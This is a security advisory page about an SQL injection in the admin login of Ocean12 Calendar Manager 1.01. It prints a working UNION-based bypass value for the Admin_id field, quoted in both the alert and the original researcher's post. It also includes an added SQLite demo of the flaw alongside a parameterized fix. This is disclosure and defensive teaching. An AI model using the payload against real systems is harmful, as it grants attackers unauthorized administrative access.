SecurityTracker.com
SecurityTracker Archives

Category:   Application (Calendar)  >   Ocean12 Calendar Manager
Vendors:   Ocean12 Technologies
Ocean12 Calendar Manager Input Validation Errors Permit SQL Injection Attacks
SecurityTracker Alert ID:  1013762
SecurityTracker URL:  http://securitytracker.com/id/1013762
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Apr 19 2005
Impact:   Disclosure of system information, Disclosure of user information, User access via network
Exploit Included:  Yes  
Version(s): 1.01
Description:   Zinho from Hackers Center reported a vulnerability in Ocean12 Calendar Manager. A remote user can inject SQL commands.

The admin login panel does not properly validate user-supplied input in the 'Admin_id' and 'Admin_password' fields. A remote user can supply specially crafted values to execute SQL commands on the underlying database and gain administrative access to the application.

A demonstration exploit value is provided:

Admin_id: Admin' UNION ALL SELECT id,id,id,id,id,id,id,id,id,id,id,id,id,id,id,id,id,id,id,id,id,id,id,id,id,id,id,id,id,id,id,id FROM settings WHERE Admin_id='Admin

Admin_password: 1
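The payload above works by closing the Admin_id string literal and using UNION ALL to absorb the remainder of the application's query (the password condition ends up on the second SELECT, while the first SELECT already matches the real admin row). The following is an added example, not code from Ocean12 or from the advisory, that reproduces this mechanism against an in-memory SQLite table and contrasts it with a parameterized query. The shape of the login query, the `settings` schema and the stored credentials are assumptions; the real application's query is not on the page, and the payload's column list is shortened from 32 `id` entries to 3 to match the demo table's width.

```python
import sqlite3

# Constructed demo schema. The advisory's payload names a `settings` table and
# an `Admin_id` column; the remaining columns, the row and the password value
# are assumptions made for this example only.
SCHEMA = """
CREATE TABLE settings (
    id INTEGER PRIMARY KEY,
    Admin_id TEXT NOT NULL,
    Admin_password TEXT NOT NULL
);
INSERT INTO settings VALUES (1, 'Admin', 'constructed-secret');
"""

# The advisory's Admin_id value, with the UNION column list shortened from 32
# to 3 `id` entries so it matches the three-column demo table.
PAYLOAD_ADMIN_ID = "Admin' UNION ALL SELECT id,id,id FROM settings WHERE Admin_id='Admin"
PAYLOAD_PASSWORD = "1"


def fresh_db():
    """Return a new in-memory database loaded with the demo schema."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def rendered_query(admin_id, admin_password):
    """Assumed shape of the vulnerable query: user input pasted into SQL text."""
    return (
        "SELECT * FROM settings WHERE Admin_id='" + admin_id
        + "' AND Admin_password='" + admin_password + "'"
    )


def login_vulnerable(conn, admin_id, admin_password):
    """Login check that builds the SQL by string concatenation (the flaw)."""
    row = conn.execute(rendered_query(admin_id, admin_password)).fetchone()
    # Any returned row is treated as a successful login.
    return row is not None


def login_parameterized(conn, admin_id, admin_password):
    """Hardened form: bound parameters, so input is data and never SQL text."""
    sql = "SELECT * FROM settings WHERE Admin_id=? AND Admin_password=?"
    row = conn.execute(sql, (admin_id, admin_password)).fetchone()
    return row is not None


def demo():
    """Run both login variants against normal and injected input."""
    conn = fresh_db()
    return {
        # A wrong password is rejected by both variants.
        "vuln_wrong_password": login_vulnerable(conn, "Admin", "wrong"),
        # The concatenated query returns the real admin row: login bypassed.
        "vuln_payload": login_vulnerable(conn, PAYLOAD_ADMIN_ID, PAYLOAD_PASSWORD),
        # With parameters, the payload is just a string that matches nothing.
        "param_payload": login_parameterized(conn, PAYLOAD_ADMIN_ID, PAYLOAD_PASSWORD),
        # The legitimate credentials still work with the hardened query.
        "param_correct": login_parameterized(conn, "Admin", "constructed-secret"),
    }


if __name__ == "__main__":
    print("Executed SQL text under injection:")
    print("  " + rendered_query(PAYLOAD_ADMIN_ID, PAYLOAD_PASSWORD))
    for name, ok in demo().items():
        print(f"{name}: {'login accepted' if ok else 'login rejected'}")
```

Printing the rendered query makes the defect visible: the first SELECT has no password condition at all, so the login succeeds whenever an admin row exists, regardless of what was typed into Admin_password. Binding both fields as parameters removes the problem without changing the query's logic.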

The vendor has been notified.

Impact:   A remote user can execute SQL commands on the underlying database. This can be exploited to gain administrative access to the application.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.ocean12scripts.com/products/calendar/
Cause:   Input validation error
Underlying OS:  Windows (Any)

Message History:   None.


Source Message Contents

Subject:  [HSC Security Group] Ocean12 Calendar manager 1.01 SQL injection


Hackers Center Security Group (http://www.hackerscenter.com/)
Zinho's Security Advisory


Product: Ocean12 Calendar manager 1.01
Site: www.ocean12scripts.com

The admin login panel suffers from an SQL injection that allows anyone
to log in as Admin.

Proof of concept:
///
- Admin_id: Admin' UNION ALL SELECT id,id,id,id,id,id,id,id,id,id,id,id,id,id,id,id,id,id,id,id,id,id,id,id,id,id,id,id,id,id,id,id FROM settings WHERE Admin_id='Admin

Admin_password: 1

///

Vendor has been contacted some weeks ago. No response received so 
far.




Author:
Zinho is webmaster and founder of http://www.hackerscenter.com,
Security research portal
Secure Web Hosting Companies Reviewed:
http://www.securityforge.com/web-hosting/secure-web-hosting.asp

zinho-no-spam @ hackerscenter.com


====>
Webmaster of
.:[ Hackers Center : Internet Security Portal]:.
http://www.hackerscenter.com
http://www.securityforge.com/web-hosting

Copyright 2019, SecurityGlobal.net LLC